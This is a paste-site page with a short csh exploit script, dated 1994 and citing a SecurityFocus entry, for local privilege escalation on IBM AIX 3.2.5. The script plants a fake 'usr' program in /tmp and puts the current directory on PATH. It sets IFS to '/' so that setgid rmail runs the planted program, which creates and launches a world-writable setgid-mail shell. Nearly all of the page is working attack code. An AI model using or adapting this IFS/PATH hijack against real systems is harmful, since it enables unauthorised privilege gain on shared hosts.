IBM AIX 3.2.5 - 'IFS' Local Privilege Escalation - Date:1994-04-02

SUBMITTED BY: FlyFar

DATE: May 16, 2024, 3:42 a.m.

FORMAT: Bash

SIZE: 676 Bytes

Raw Download

HITS: 433

Report
  1. # source: https://www.securityfocus.com/bid/454/info
  2. #
  3. # Under older versions of AIX By changing the IFS enviroment variable to / setuid root programs # that use system() or popen() can be fooled into running user provided programs.
  4. #
  6. #!/bin/csh
  7. # IFS hole in AIX3.2 rmail gives egid=mail. Apr. 1994
  9. # Setup needed files.
  11. mkdir /tmp/.rmail
  12. cd /tmp/.rmail
  14. cat << EOF > usr
  15. cp sh mailsh
  16. chmod 2777 mailsh
  17. EOF
  18. chmod 777 usr
  19. ln -s /bin/sh .
  21. # Set PATH, IFS, and run rmail.
  23. setenv PATH .:$PATH
  24. setenv IFS /
  25. echo "cheezy mail hack" | rmail joeuser@nohost.com
  26. unsetenv IFS
  27. rm -f usr sh # minor cleanup.
  28. echo "Attempting to run sgid shell."
  29. ./mailsh
comments powered by Disqus